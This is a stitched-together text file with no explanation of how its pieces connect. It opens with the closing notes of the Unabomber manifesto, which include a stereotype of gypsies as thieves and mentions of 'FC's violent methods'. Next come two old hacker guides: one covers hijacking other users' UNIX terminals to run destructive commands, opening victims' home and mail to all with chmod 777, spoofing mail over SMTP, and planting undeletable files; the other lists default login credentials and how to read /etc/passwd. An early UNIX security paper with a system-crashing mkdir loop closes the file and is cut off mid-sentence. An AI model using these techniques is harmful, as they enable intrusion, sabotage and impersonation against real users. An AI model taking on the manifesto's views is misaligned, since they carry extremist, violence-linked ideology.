serve society and the duty of society to take care of the
individual. He has a negative attitude toward
individualism. He often takes a moralistic tone. He tends
to be for gun control, for sex education and other
psychologically "enlightened" educational methods, for
social planning, for affirmative action, for multi-
culturalism. He tends to identify with victims. He tends
to be against competition and against violence, but he
ofte finds excuses for those leftists who do commit
violence. He is fond of using the common catch-phrases of
the left, like "racism," "sexism," "homophobia,"
"capitalism," "imperialism," "neocolonialism,"
"genocide," "social change," "social justice," "social
responsibility." Maybe the best diagnostic trait of the
leftist is his tendency to sympathize with the following
movements: feminism, gay rights, ethnic rights,
disability rights, animal rights, political correctness.
Anyone who strongly sympathizes with ALL of these
movements is almost certainly a leftist. [36]

230. The more dangerous leftists, that is, those who are
most power-hungry, are often characterized by arrogance
or by a dogmatic approach to ideology. However, the most
dangerous leftists of all may be certain oversocialized
types who avoid irritating displays of aggressiveness and
refrain from advertising their leftism, but work quietly
and unobtrusively to promote collectivist values,
"enlightened" psychological techniques for socializing
children, dependence of the individual on the system, and
so forth. These crypto-leftists (as we may call them)
approximate certain bourgeois types as far as practical
action is concerned, but differ from them in psychology,
ideology and motivation. The ordinary bourgeois tries to
bring people under control of the system in order to
protect his way of life, or he does so simply because his
attitudes are conventional. The crypto-leftist tries to
bring people under control of the system because he is a
True Believer in a collectivistic ideology. The
crypto-leftist is differentiated from the average leftist
of the oversocialized type by the fact that his
rebellious impulse is weaker and he is more securely
socialized. He is differentiated from the ordinary
well-socialized bourgeois by the fact that there is some
deep lack within him that makes it necessary for him to
devote himself to a cause and immerse himself in a
collectivity. And maybe his (well-sublimated) drive for
power is stronger than that of the average bourgeois.


FINAL NOTE

231. Throughout this article we've made imprecise
statements and statements that ought to have had all
sorts of qualifications and reservations attached to
them; and some of our statements may be flatly false.
Lack of sufficient information and the need for brevity
made it impossible for us to formulate our assertions
more precisely or add all the necessary qualifications.
And of course in a discussion of this kind one must rely
heavily on intuitive judgment, and that can sometimes be
wrong. So we don't claim that this article expresses more
than a crude approximation to the truth.

232. All the same, we are reasonably confident that the
general outlines of the picture we have painted here are
roughly correct. Just one possible weak point needs to be
mentioned. We have portrayed leftism in its modern form
as a phenomenon peculiar to our time and as a symptom of
the disruption of the power process. But we might
possibly be wrong about this. Oversocialized types who
try to satisfy their drive for power by imposing their
morality on everyone have certainly been around for a
long time. But we THINK that the decisive role played by
feelings of inferiority, low self-esteem, powerlessness,
identification with victims by people who are not
themselves victims, is a peculiarity of modern leftism.
Identification with victims by people not themselves
victims can be seen to some extent in 19th century
leftism and early Christianity but as far as we can make
out, symptoms of low self-esteem, etc., were not nearly
so evident in these movements, or in any other movements,
as they are in modern leftism. But we are not in a
position to assert confidently that no such movements
have existed prior to modern leftism. This is a
significant question to which historians ought to give
their attention.

NOTES

1. (Paragraph 19) We are asserting that ALL, or even
most, bullies and ruthless competitors suffer from
feelings of inferiority.

2. (Paragraph 25) During the Victorian period many
oversocialized people suffered from serious psychological
problems as a result of repressing or trying to repress
their sexual feelings. Freud apparently based his
theories on people of this type. Today the focus of
socialization has shifted from sex to aggression.

3. (Paragraph 27) Not necessarily including specialists
in engineering or the "hard" sciences.

4. (Paragraph 28) There are many individuals of the
middle and upper classes who resist some of these values,
but usually their resistance is more or less covert. Such
resistance appears in the mass media only to a very
limited extent. The main thrust of propaganda in our
society is in favor of the stated values. The main reason
why these values have become, so to speak, the official
values of our society is that they are useful to the
industrial system. Violence is discouraged because it
disrupts the functioning of the system. Racism is
discouraged because ethnic conflicts also disrupt the
system, and discrimination wastes the talents of
minority-group members who could be useful to the system.
Poverty must be "cured" because the underclass causes
problems for the system and contact with the underclass
lowers the morale of the other classes. Women are
encouraged to have careers because their talents are
useful to the system and, more importantly, because by
having regular jobs women become better integrated into
the system and tied directly to it rather than to their
families. This helps to weaken family solidarity. (The
leaders of the system say they want to strengthen the
family, but they really mean is that they want the family
to serve as an effective tool for socializing children in
accord with the needs of the system. We argue in
paragraphs 51, 52 that the system cannot afford to let
the family or other small-scale social groups be strong
or autonomous.)

5. (Paragraph 42) It may be argued that the majority of
people don't want to make their own decisions but want
leaders to do their thinking for them. There is an
element of truth in this. People like to make their own
decisions in small matters, but making decisions on
difficult, fundamental questions requires facing up to
psychological conflict, and most people hate
psychological conflict. Hence they tend to lean on others
in making difficult decisions. But it does not follow
that they like to have decisions imposed upon them
without having any opportunity to influence those
decisions. The majority of people are natural followers,
not leaders, but they like to have direct personal access
to their leaders, they want to be able to influence the
leaders and participate to some extent in making even the
difficult decisions. At least to that degree they need
autonomy.

6. (Paragraph 44) Some of the symptoms listed are similar
to those shown by caged animals. To explain how these
symptoms arise from deprivation with respect to the power
process: ommon-sense understanding of human nature tells
one that lack of goals whose attainment requires effort
leads to boredom and that boredom, long continued, often
leads eventually to depression. Failure to attain goals
leads to frustration and lowering of self-esteem.
Frustration leads to anger, anger to aggression, often in
the form of spouse or child abuse. It has been shown that
long-continued frustration commonly leads to depression
and that depression tends to cause guilt, sleep
disorders, eating disorders and bad feelings about
oneself. Those who are tending toward depression seek
pleasure as an antidote; hence insatiable hedonism and
excessive sex, with perversions as a means of getting new
kicks. Boredom too tends to cause excessive
pleasure-seeking since, lacking other goals, people often
use pleasure as a goal. See accompanying diagram.

The foregoing is a simplification. Reality is more
complex, and of course, deprivation with respect to the
power process is not the ONLY cause of the symptoms
described. By the way, when we mention depression we do
not necessarily mean depression that is severe enough to
be treated by a psychiatrist. Often only mild forms of
depression are involved. And when we speak of goals we do
not necessarily mean long-term, thoughtout goals. For
many or most people through much of human history, the
goals of a hand-to-mouth existence (merely providing
oneself and one's family with food from day to day) have
been quite sufficient.

7. (Paragraph 52) A partial exception may be made for a
few passive, inwardlooking groups, such as the Amish,
which have little effect on the wider society. Apart from
these, some genuine small-scale communities do exist in
America today. For instance, youth gangs and "cults."
Everyone regards them as dangerous, and so they are,
because the members of these groups are loyal primarily
to one another rather than to the system, hence the
system cannot control them. Or take the gypsies. The
gypsies commonly get away with theft and fraud because
their loyalties are such that they can always get other
gypsies to give testimony that "proves" their innocence.
Obviously the system would be in serious trouble if too
many people belonged to such groups. Some of the
early-20th century Chinese thinkers who were concerned
with modernizing China recognized the necessity breaking
down small-scale social groups such as the family:
"(According to Sun Yat-sen) the Chinese people needed a
new surge of patriotism, which would lead to a transfer
of loyalty from the family to the state.... (According to
Li Huang) traditional attachments, particularly to the
family had to be abandoned if nationalism were to develop
in China." (Chester C. Tan, "Chinese Political Thought in
the Twentieth Century," page 125, page 297.)

8. (Paragraph 56) Yes, we know that 19th century America
had its problems, and serious ones, but for the sake of
brevity we have to express ourselves in simplified terms.

9. (Paragraph 61) We leave aside the "underclass." We are
speaking of the mainstream.

10. (Paragraph 62) Some social scientists, educators,
"mental health" professionals and the like are doing
their best to push the social drives into group 1 by
trying to see to it that everyone has a satisfactory
social life.

11. (Paragraphs 63, 82) Is the drive for endless material
acquisition really an artificial creation of the
advertising and marketing industry? Certainly there is no
innate human drive for material acquisition. There have
been many cultures in which people have desired little
material wealth beyond what was necessary to satisfy
their basic physical needs (Australian aborigines,
traditional Mexican peasant culture, some African
cultures). On the other hand there have also been many
pre-industrial cultures in which material acquisition has
played an important role. So we can't claim that today's
acquisition-oriented culture is exclusively a creation of
the advertising and marketing industry. But it is clear
that the advertising and marketing industry has had an
important part in creating that culture. The big
corporations that spend millions on advertising wouldn't
be spending that kind of money without solid proof that
they were getting it back in increased sales. One member
of FC met a sales manager a couple of years ago who was
frank enough to tell him, "Our job is to make people buy
things they don't want and don't need." He then described
how an untrained novice could present people with the
facts about a product, and make no sales at all, while a
trained and experienced professional salesman would make
lots of sales to the same people. This shows that people
are manipulated into buying things they don't really
want.

12. (Paragraph 64) The problem of purposelessness seems
to have become less serious during the last 15 years or
so, because people now feel less secure physically and
economically than they did earlier, and the need for
security provides them with a goal. But purposelessness
has been replaced by frustration over the difficulty of
attaining security. We emphasize the problem of
purposelessness because the liberals and leftists would
wish to solve our social problems by having society
guarantee everyone's security; but if that could be done
it would only bring back the problem of purposelessness.
The real issue is not whether society provides well or
poorly for people's security; the trouble is that people
are dependent on the system for their security rather
than having it in their own hands. This, by the way, is
part of the reason why some people get worked up about
the right to bear arms; possession of a gun puts that
aspect of their security in their own hands.

13. (Paragraph 66) Conservatives' efforts to decrease the
amount of government regulation are of little benefit to
the average man. For one thing, only a fraction of the
regulations can be eliminated because most regulations
are necessary. For another thing, most of the
deregulation affects business rather than the average
individual, so that its main effect is to take power from
the government and give it to private corporations. What
this means for the average man is that government
interference in his life is replaced by interference from
big corporations, which may be permitted, for example, to
dump more chemicals that get into his water supply and
give him cancer. The conservatives are just taking the
average man for a sucker, exploiting his resentment of
Big Government to promote the power of Big Business.

14. (Paragraph 73) When someone approves of the purpose
for which propaganda is being used in a given case, he
generally calls it "education" or applies to it some
similar euphemism. But propaganda is propaganda
regardless of the purpose for which it is used.

15. (Paragraph 83) We are not expressing approval or
disapproval of the Panama invasion. We only use it to
illustrate a point.

16. (Paragraph 95) When the American colonies were under
British rule there were fewer and less effective legal
guarantees of freedom than there were after the American
Constitution went into effect, yet there was more
personal freedom in pre-industrial America, both before
and after the War of Independence, than there was after
the Industrial Revolution took hold in this country. We
quote from "Violence in America: Historical and
Comparative Perspectives," edited by Hugh Davis Graham
and Ted Robert Gurr, Chapter 12 by Roger Lane, pages
476-478: "The progressive heightening of standards of
propriety, and with it the increasing reliance on
official law enforcement (in l9th century America) ...
were common to the whole society.... [T]he change in
social behavior is so long term and so widespread as to
suggest a connection with the most fundamental of
contemporary social processes; that of industrial
urbanization itself...."Massachusetts in 1835 had a
population of some 660,940, 81 percent rural,
overwhelmingly preindustrial and native born. It's
citizens were used to considerable personal freedom.
Whether teamsters, farmers or artisans, they were all
accustomed to setting their own schedules, and the nature
of their work made them physically independent of each
other.... Individual problems, sins or even crimes, were
not generally cause for wider social concern...."But the
impact of the twin movements to the city and to the
factory, both just gathering force in 1835, had a
progressive effect on personal behavior throughout the
19th century and into the 20th. The factory demanded
regularity of behavior, a life governed by obedience to
the rhythms of clock and calendar, the demands of foreman
and supervisor. In the city or town, the needs of living
in closely packed neighborhoods inhibited many actions
previously unobjectionable. Both blue- and white-collar
employees in larger establishments were mutually
dependent on their fellows; as one man's work fit into
anther's, so one man's business was no longer his own.
"The results of the new organization of life and work
were apparent by 1900, when some 76 percent of the
2,805,346 inhabitants of Massachusetts were classified as
urbanites. Much violent or irregular behavior which had
been tolerable in a casual, independent society was no
longer acceptable in the more formalized, cooperative
atmosphere of the later period.... The move to the cities
had, in short, produced a more tractable, more
socialized, more 'civilized' generation than its
predecessors."

17. (Paragraph 117) Apologists for the system are fond of
citing cases in which elections have been decided by one
or two votes, but such cases are rare.

18. (Paragraph 119) "Today, in technologically advanced
lands, men live very similar lives in spite of
geographical, religious, and political differences. The
daily lives of a Christian bank clerk in Chicago, a
Buddhist bank clerk in Tokyo, and a Communist bank clerk
in Moscow are far more alike than the life of any one of
them is like that of any single man who lived a thousand
years ago. These similarities are the result of a common
technology...." L. Sprague de Camp, "The Ancient
Engineers," Ballantine edition, page 17. The lives of the
three bank clerks are not IDENTICAL. Ideology does have
SOME effect. But all technological societies, in order to
survive, must evolve along APPROXIMATELY the same
trajectory.

19. (Paragraph 123) Just think an irresponsible genetic
engineer might create a lot of terrorists.

20. (Paragraph 124) For a further example of undesirable
consequences of medical progress, suppose a reliable cure
for cancer is discovered. Even if the treatment is too
expensive to be available to any but the elite, it will
greatly reduce their incentive to stop the escape of
carcinogens into the environment.

21. (Paragraph 128) Since many people may find
paradoxical the notion that a large number of good things
can add up to a bad thing, we illustrate with an analogy.
Suppose Mr. A is playing chess with Mr. B. Mr. C, a Grand
Master, is looking over Mr. A's shoulder. Mr. A of course
wants to win his game, so if Mr. C points out a good move
for him to make, he is doing Mr. A a favor. But suppose
now that Mr. C tells Mr. A how to make ALL of his moves.
In each particular instance he does Mr. A a favor by
showing him his best move, but by making ALL of his moves
for him he spoils his game, since there is not point in
Mr. A's playing the game at all if someone else makes all
his moves. The situation of modern man is analogous to
that of Mr. A. The system makes an individual's life
easier for him in innumerable ways, but in doing so it
deprives him of control over his own fate.

22. (Paragraph 137) Here we are considering only the
conflict of values within the mainstream. For the sake of
simplicity we leave out of the picture "outsider" values
like the idea that wild nature is more important than
human economic welfare.

23. (Paragraph 137) Self-interest is not necessarily
MATERIAL self-interest. It can consist in fulfillment of
some psychological need, for example, by promoting one's
own ideology or religion.

24. (Paragraph 139) A qualification: It is in the
interest of the system to permit a certain prescribed
degree of freedom in some areas. For example, economic
freedom (with suitable limitations and restraints) has
proved effective in promoting economic growth. But only
planned, circumscribed, limited freedom is in the
interest of the system. The individual must always be
kept on a leash, even if the leash is sometimes long (see
paragraphs 94, 97).

25. (Paragraph 143) We don't mean to suggest that the
efficiency or the potential for survival of a society has
always been inversely proportional to the amount of
pressure or discomfort to which the society subjects
people. That certainly is not the case. There is good
reason to believe that many primitive societies subjected
people to less pressure than European society did, but
European society proved far more efficient than any
primitive society and always won out in conflicts with
such societies because of the advantages conferred by
technology.

26. (Paragraph 147) If you think that more effective law
enforcement is unequivocally good because it suppresses
crime, then remember that crime as defined by the system
is not necessarily what YOU would call crime. Today,
smoking marijuana is a "crime," and, in some places in
the U.S., so is possession of an unregistered handgun.
Tomorrow, possession of ANY firearm, registered or not,
may be made a crime, and the same thing may happen with
disapproved methods of child-rearing, such as spanking.
In some countries, expression of dissident political
opinions is a crime, and there is no certainty that this
will never happen in the U.S., since no constitution or
political system lasts forever. If a society needs a
large, powerful law enforcement establishment, then there
is something gravely wrong with that society; it must be
subjecting people to severe pressures if so many refuse
to follow the rules, or follow them only because forced.
Many societies in the past have gotten by with little or
no formal law-enforcement.

27. (Paragraph 151) To be sure, past societies have had
means of influencing human behavior, but these have been
primitive and of low effectiveness compared with the
technological means that are now being developed.

28. (Paragraph 152) However, some psychologists have
publicly expressed opinions indicating their contempt for
human freedom. And the mathematician Claude Shannon was
quoted in Omni (August 1987) as saying, "I visualize a
time when we will be to robots what dogs are to humans,
and I'm rooting for the machines."

29. (Paragraph 154) This is no science fiction! After
writing paragraph 154 we came across an article in
Scientific American according to which scientists are
actively developing techniques for identffying possible
future criminals and for treating them by a combination
of biological and psychological means. Some scientists
advocate compulsory application of the treatment, which
may be available in the near future. (See "Seeking the
Criminal Element," by W. Wayt Gibbs, Scientific American,
March 1995.) Maybe you think this is OK because the
treatment would be applied to those who might become
violent criminals. But of course it won't stop there.
Next, a treatment will be applied to those who might
become drunk drivers (they endanger human life too), then
perhaps to peel who spank their children, then to
environmentalists who sabotage logging equipment,
eventually to anyone whose behavior is inconvenient for
the system.

30. (Paragraph 184) A further advantage of nature as a
counter-ideal to technology is that, in many people,
nature inspires the kind of reverence that is associated
with religion, so that nature could perhaps be idealized
on a religious basis. It is true that in many societies
religion has served as a support and justification for
the established order, but it is also true that religion
has often provided a basis for rebellion. Thus it may be
useful to introduce a religious element into the
rebellion against technology, the more so because Western
society today has no strong religious foundation.
Religion, nowadays either is used as cheap and
transparent support for narrow, short-sighted selfishness
(some conservatives use it this way), or even is
cynically exploited to make easy money (by many
evangelists), or has degenerated into crude irrationalism
(fundamentalist protestant sects, "cults"), or is simply
stagnant (Catholicism, main-line Protestantism). The
nearest thing to a strong, widespread, dynamic religion
that the West has seen in recent times has been the
quasi-religion of leftism, but leftism today is
fragmented and has no clear, unified, inspiring goal.
Thus there is a religious vacuum in our society that
could perhaps be filled by a religion focused on nature
in opposition to technology. But it would be a mistake to
try to concoct artificially a religion to fill this role.
Such an invented religion would probably be a failure.
Take the "Gaia" religion for example. Do its adherents
REALLY believe in it or are they just play-acting? If
they are just play-acting their religion will be a flop
in the end. It is probably best not to try to introduce
religion into the conflict of nature vs. technology
unless you REALLY believe in that religion yourself and
find that it arouses a deep, strong, genuine response in
many other people.

31. (Paragraph 189) Assuming that such a final push
occurs. Conceivably the industrial system might be
eliminated in a somewhat gradual or piecemeal fashion
(see paragraphs 4, 167 and Note 4).

32. (Paragraph 193) It is even conceivable (remotely)
that the revolution might consist only of a massive
change of attitudes toward technology resulting in a
relatively gradual and painless disintegration of the
industrial system. But if this happens we'll be very
lucky. It's far more probably that the transition to a
nontechnological society will be very difficult and full
of conflicts and disasters.

33. (Paragraph 195) The economic and technological
structure of a society are far more important than its
political structure in determining the way the average
man lives (see paragraphs 95, 119 and Notes 16, 18).

34. (Paragraph 215) This statement refers to our
particular brand of anarchism. A wide variety of social
attitudes have been called "anarchist," and it may be
that many who consider themselves anarchists would not
accept our statement of paragraph 215. It should be
noted, by the way, that there is a nonviolent anarchist
movement whose members probably would not accept FC as
anarchist and certainly would not approve of FC's violent
methods.

35. (Paragraph 219) Many leftists are motivated also by
hostility, but the hostility probably results in part
from a frustrated need for power.

36. (Paragraph 229) It is important to understand that we
mean someone who sympathizes with these MOVEMENTS as they
exist today in our society. One who believes that women,
homosexuals, etc., should have equal rights is not
necessary a leftist. The feminist, gay rights, etc.,
movements that exist in our society have the particular
ideological tone that characterizes leftism, and if one
believes, for example, that women should have equal
rights it does not necessarily follow that one must
sympathize with the feminist movement as it exists today.

If copyright problems make it impossible for this long
quotation to be printed, then please change Note 16 to
read as follows:

16. (Paragraph 95) When the American colonies were under
British rule there were fewer and less effective legal
guarantees of freedom than there were after the American
Constitution went into effect, yet there was more
personal freedom in pre-industrial America, both before
and after the War of Independence, than there was after
the Industrial Revolution took hold in this country. In
"Violence in America: Historical and Comparative
Perspectives," edited by Hugh Davis Graham and Ted Robert
Gurr, Chapter 12 by Roger Lane, it is explained how in
pre-industrial America the average person had greater
independence and autonomy than he does today, and how the
process of industrialization necessarily led to the
restriction of personal freedom.

_______________________________________________________

[[Verbal approximation The Washington Post graphic.]]

DIAGRAM OF SYMPTOMS RESULTING FROM DISRUPTION OF THE
POWER PROCESS


LACK OF GOALS WHOSE ATTAINMENT REQUIRES EFFORT [[box]]
linked to Boredom which is linked to Excessive
pleasure-seeking and both linked are to Tendency to
depression.

Excessive pleasure-seeking linked to Insatiable hedonis,
Sexual perversion and Overeating.

Tendency to depression [[center of diagram spoke]] linked
to Frustration linked to FAILURE TO ATTAIN GOALS [[box]].

Tendency to depression linked to Eating disorders, Sleep
disorders, Guilt, Anxiety and Low self-esteem.

Frustration linked to Anger which is linked to Abuse.

FAILURE TO ATTAIN GOALS linked to Low self-esteem.

_______________________________________________________


[[End of The Washington Post document]]







                       *** A List Of Some OF The Most Useful UNIX **
     *** Hacking Commands, and Some Hints On Their Usage ***
       
---------------------------------------------------------------

     It is fun and often usefull to create a file that is owned 
by someone else.  On most systems with slack security ie 99% of 
all UNIX systems, this is quite easily done.  The chown command 
will change any of your files to make someone else the owner. 
Format is as follows:

chown ownername filelist

 Where ownername is the new owner, and filelist is the list of 
files to change.  You must own the file which your are goin to 
change, unless you are a superuser....then u can change ANYTHING!
     chgrp is a similar command which will change the group 
ownership on a file.  If you are going to do both a chown and a 
chgrp on a file, then make sure you do the chgrp first!  Once the 
file is owned by someone else, you cant change nything about it!

---------------------------------------------------------------

     Sometimes just seeing who is on the system is a challenge in 
itself.  The best way is to write your own version of who in C, 
but if you can't do that then this may be of some help to you:

     who   followed by on or more of the following flags:

          -b Displays time sys as last booted.
          -H Precedes output with header.
          -l Lists lines waiting for users to logon.
          -q displays number of users logged on.
          -t displays time sys clock was last changed.
          -T displays the state field (a + indicates it is 
possible to send to terminal, a - means u cannot)
          -u Give a complete listing of those logged on.

   **who -HTu is about the best choice for the average user**

##by the way, the list of users logged on is kept in the file 
/etc/utmp.  If you want to write your own personalised version of 
who in C, you now know where to look!###

--------------------------------------------------------------- 

     When a users state field (see -T flag option for who 
command) says that a user has their message function on, this 
actually means that it is possible to get stuff onto their 
screen.
     Basically, every terminal on the system has a file 
corresponding to it.  These files can be found in the /dev 
directory.  You can to anything to these files, so long as you 
have access -eg you can read them, and write to them, but you 
will notice that they never change in size.  They are called 
character specific files, and are really the link between the 
system and the terminals.  Whatever you put in these files will 
go staright to the terminal it corresponds to.
     Unfortunately, on most systems, when the user logs in, the 
"mesg n" command is issued which turns off write access to that 
terminal, BUT- if you can start cating to that terminal before 
system issues the mesg n command, then you will continue to be 
able to get stuff up on that terminal! This has many varied uses.

     Check out the terminal, or terminal software being used.  
Often you will be able to remotely program another users 
terminal, simply by 'cating' a string to a users screen.  You 
might be able to set up a buffer, capturing all that is typed, or 
you may be able to send the terminal into a frenzy- (sometimes a 
user will walk away without realizing that they are sill 
effectively logged on, leaving you with access to their 
account!).  Some terminal types also have this great command 
called transmit screen. It transmits everything on the screen, 
just as if the user had typed it !
     So just say I wanted to log off a user, then I would send a 
clear screen command (usually ctrl l), followed by "exit" 
followed by a carriage return, followed by the transmit screen 
code.  Using ths technique you can wipe peoples directories or 
anything.  My favourite is to set open access on all their files 
and directories so I can peruse them for deletion etc at my own 
leisure).            

---------------------------------------------------------------

     If you ever briefly get access to another persons account 
eg. they leave the room to go to toilet or whatever, then simply 
type the following:

chmod 777 $HOME
chmod 777 $MAIL

     Then clear the screen so they dont see what you just typed.

     Now you can go look at their directory, and their mail, and 
you can even put mail in their mail file. (just use the same 
format as any mail that is already there!). Next time they log in 
the system will automatically inform them they have new mail!

---------------------------------------------------------------

     Another way to send fake mail to people is to use the mail 
server.  This method produces mail that is slightly different to 
normal, so anyone who uses UNIX a bit may be suspiscious when 
they receive it, but it will fool the average  user!

type telnet

the following prompt will appear:

telnet>

now type :

open localhost 25

some crap will come up about the mail server..now type:

mail from: xxxxxx     Put any name you want.

some more bullshit will come up. Now type:

rcpt to: xxxxxx  Put the name of the person to receive mail here.

now type:

data

now you can type the letter...end it with a "."
type quit to exit once you are done.

-------------------------------------------------------------

     Heres one for any experimenters out there...
It is possible to create files which simply cannot be deleted 
from the standard shell.  To do this you will have to physically 
CREATE THE FILE USING A C PROGRAM or SCRIPT FILE, and you will 
have to use a sequence of control characters which cannot be 
typed from the shell.  Try things like Ctrl-h (this is the 
code for the delete key).  Just a file with the name Ctrl-h would 
not be deleteable from the shell, unless you used wildcards. So, 
make it a nice long series of characters, so that to delete the 
file, the user has no choice but to individually copy all his 
files elsewhere, then delete everything in his directory, and 
then copy all his files back.....this is one of my 
favourites..gets em every time!
     
     The following script file is an example which will create a 
file with the name Ctrl-h.  You MUST tyoe this file in using the 
vi editor or similar.
*****If you are not very good with vi, type "man vi" and print the 
help file...it even contains stuff that I find useful now and 
then.*****

type the following in vi...

echo'' > 'a^h'

  ***NOTE...to get the ^h (this really means ctrl-h) from vi type:

Ctrl v
Ctrl h 

  The Ctrl v instrcts vi to take the next character as a ascii 
character, and not to interpret it.
     change the access on the file you just created and now 
execute it.  It will create a file which looks like it is called 
a, but try to delete it !..use wildcards if you really want to 
delete it. 

*> Title:   Tutorial on hacking through a UNIX system


** 
 
In the following file, all references made to the name Unix, may also be 
substituted to the Xenix operating system. 
 
Brief history:  Back in the early sixties, during the development of 
third generation computers at MIT, a group of programmers studying the 
potential of computers, discovered their ability of performing two or 
more tasks simultaneously.  Bell Labs, taking notice of this discovery, 
provided funds for their developmental scientists to investigate into this 
new frontier.  After about 2 years of developmental research, they produced 
an operating system they called "Unix".  
Sixties to Current:  During this time Bell Systems installed the Unix system 
to provide their computer operators with the ability to multitask so that 
they could become more productive, and efficient.  One of the systems they
put on the Unix system was called "Elmos". Through Elmos many tasks (i.e.
billing,and installation records) could be done by many people using the same 
mainframe. 
 
Note: Cosmos is accessed through the Elmos system. 
 
Current:  Today, with the development of micro computers, such multitasking 
can be achieved by a scaled down version of Unix (but just as 
powerful).  Microsoft,seeing this development, opted to develop their own 
Unix like system for the IBM line of PC/XT's.  Their result they called 
Xenix (pronounced zee-nicks).  Both Unix and Xenix can be easily installed 
on IBM PC's and offer the same function (just 2 different vendors). 
 
Note: Due to the many different versions of Unix (Berkley Unix, 
Bell System III, and System V the most popular) many commands 
following may/may not work. I have written them in System V routines. 
Unix/Xenix operating systems will be considered identical systems below. 
 
How to tell if/if not you are on a Unix system:  Unix systems are quite 
common systems across the country. Their security appears as such: 
 
Login;     (or login;) 
password: 
 
When hacking on a Unix system it is best to use lowercase because the Unix 
system commands are all done in lower- case. Login; is a 1-8 character field. It is 
usually the name (i.e. joe or fred) of the user, or initials (i.e. j.jones 
or f.wilson).  Hints for login names can be found trashing the location of 
the dial-up (use your CN/A to find where the computer is). Password: is a 1-8 character password assigned by the sysop or chosen by the user. 
   
   Common default logins 
   -------------------------- 
   login;       Password: 
   root         root,system,etc.. 
   sys          sys,system 
   daemon       daemon 
   uucp         uucp 
   tty          tty 
   test         test 
   unix         unix 
   bin          bin 
   adm          adm 
   who          who 
   learn        learn 
   uuhost       uuhost 
   nuucp        nuucp 
 
If you guess a login name and you are not asked for a password, and have 
accessed to the system, then you have what is known as a non-gifted account. 
If you guess a correct login and pass- word, then you have a user account. 
And, if you get the root p/w you have a "super-user" account. 
All Unix systems have the following installed to their system: 
root, sys, bin, daemon, uucp, adm Once you are in the system, you will 
get a prompt. Common prompts are: 
 
$ 
% 
# 
 
But can be just about anything the sysop or user wants it to be. 
 
Things to do when you are in: Some of the commands that you may want to 
try follow below: 
 
who is on  (shows who is currently logged on the system.) 
write name (name is the person you wish to chat with) 
To exit chat mode try ctrl-D. 
EOT=End of Transfer. 
ls -a      (list all files in current   directory.) 
du -a      (checks amount of memory  your files use;disk usage) 
cd\name    (name is the name of the sub-directory you choose) 
cd\        (brings your home directory  to current use) 
cat name   (name is a filename either  a program or documentation  your username has written) 
 Most Unix programs are written  in the C language or Pascal 
 since Unix is a programmers'  environment. One of the first things done on the 
system is print up or capture (in a buffer) the file containing all user names and accounts. This can be done by doing the following command: 
 
cat /etc/passwd 
 
If you are successful you will see a list of all accounts on the system.  It 
should look like this:  
root:hvnsdcf:0:0:root dir:/: joe:majdnfd:1:1:Joe Cool:/bin:/bin/joe hal::1:2:Hal Smith:/bin:/bin/hal 
 
The "root" line tells the following info : 
login name=root 
hvnsdcf   = encrypted password 
0         = user group number 
0         = user number 
root dir  = name of user 
/         = root directory 
 
In the Joe login, the last part "/bin/joe " tells us which directory 
is his home directory (joe) is. In the "hal" example the login name is 
followed by 2 colons, that means that there is no password needed to get in 
using his name. 
 
Conclusion:  I hope that this file will help other novice Unix hackers 
obtain access to the Unix/Xenix systems that they may find.



		      On the Security of UNIX

		      =-=-=-=-=-=-=-=-=-=-=-=

Recently there has been much interest in the security aspects of operating

systems and software.At issue is the ability to prevent undesired disclosure of

information, destruction of information,and harm to the functioning of the

system.This paper discusses the degree of security which can be provided under

the system and offers a number of hints on how to improve security.The first

fact to face is that UNIX was not developed with security,in any realistic

sense,in mind;this fact alone guarantees a vast number of holes.(Actually the

same statement can be made with respect to most systems.)



The area of security in which is theoretically weakest is in protecting against

crashing or at least crippling the operation of the system.The problem here is

not mainly in uncritical acceptance of bad parameters to system calls (there

may be bugs in this area, but none are known)but rather in lack of checks for

excessive consumption of resources.



Most notably, there is no limit on the amount of disk storage used, either in

total space allocated or in the number of files or directories.Here is a

particularly ghastly shell sequence guaranteed to stop the system:





while : ; do

	mkdir x

	cd x

done



Either a panic will occur because all the i-nodes on the device are used up,

or all the disk blocks will be consumed, thus preventing anyone from writing

files on the device.In this version of the system,users are prevented from

creating more than a set number of processes simultaneously,so unless users

are in collusion it is unlikely that any one can stop the system altogether.



However, creation of 20 or so CPU or disk-bound jobs leaves few resources

available for others.Also, if many large jobs are run simultaneously,swap space

may run out, causing a panic.  It should be evident that excessive consumption

of diskspace, files, swap space and processes can easily occur accidentally in

malfunctioning programs as well as at command level.In fact UNIX is essentially

defenseless against this kind of abuse,nor is there any easy fix.The best that

can be said is that it is generally fairly easy to detect what has happened

when disaster strikes ,to identify the user responsible, and take appropriate

action.In practice,we have found that difficulties in this area are rather

rare,but we have not been faced with malicious users,and enjoy a fairly

generous supply of resources which have served to cushion us against accidental

overconsumption.



The picture is considerably brighter in the area of protection of information

from unauthorized perusal and destruction.Here the degree of security seems

(almost) adequate theoretically, and the problems lie more in the necessity for

care in the actual use of the system.Each UNIX file has associated with it

eleven bits of protection information together with a user identification

number and a user-group identification number (UID and GID).



Nine of the protection bits are used to specify independently permission to

read, to write, and to execute the file to the user himself, to members of the

user's group, and to all other users.Each process generated by or for a user

has associated with it an effective UID and a real UID, and an effective and

real GID.When an attempt is made to access the file for reading, writing, or

executing UID for the process is changed to the UID associated with the file;

the change persists until the process terminates or until the UID changed again

by another execution of a set-UID file.Similarly the effective group ID of a

process is changed to the GID associated with a file when that file is executed

and has the set-GID bit set.The real UID and GID of a process do not change

when any file is executed,but only as the result of a privileged system

call.The basic notion of the set-UID and set-GID bits is that one may write a

program which is executableby others and which maintains files accessible to

others only by that program.



The classical example is the game-playing program which maintains records of

the scores of its players.The program itself has to read and write the score

file,but no one but the game's sponsor can be allowed unrestricted access to

the file lest they manipulate the game to their own advantage.



The solution is to turn on the set-UID bit of the game program.  When, and only

when,it is invoked by players of the game,it may update the score file but

ordinary programs executed by others cannot access the score.  There are a

number of special cases involved in determining access permissions.  Since

executing a directory as a program is a meaningless operation,the

execute-permission bit, for directories, is taken instead to mean permission to

search the directory for a given file during the scanning of a path name; thus

if a directory has execute permission but no read permission for a given user,

he may access files with known names in the directory,but may not read (list)

the entire contents of the directory.



Write permission on a directory is interpreted to mean that the user may create

and delete files in that directory;it is impossible for any user to write

directly into any directory..Another, and from the point of view of security,

much more serious special case is that there is a ``super user'' who is able to

read any file and write any non-directory.The super-user is also able to change

the protection mode and the owner UID and GID of any file and to invoke

privileged system calls.It must be recognized that the mere notion of a

super-user is a theoretical, and usually practical, blemish on any protection

scheme.



The first necessity for a secure system is of course arranging that all files

and directories have the proper protection modes.Traditionally, UNIX software

has been exceedingly permissive in this regard;essentially all commands create

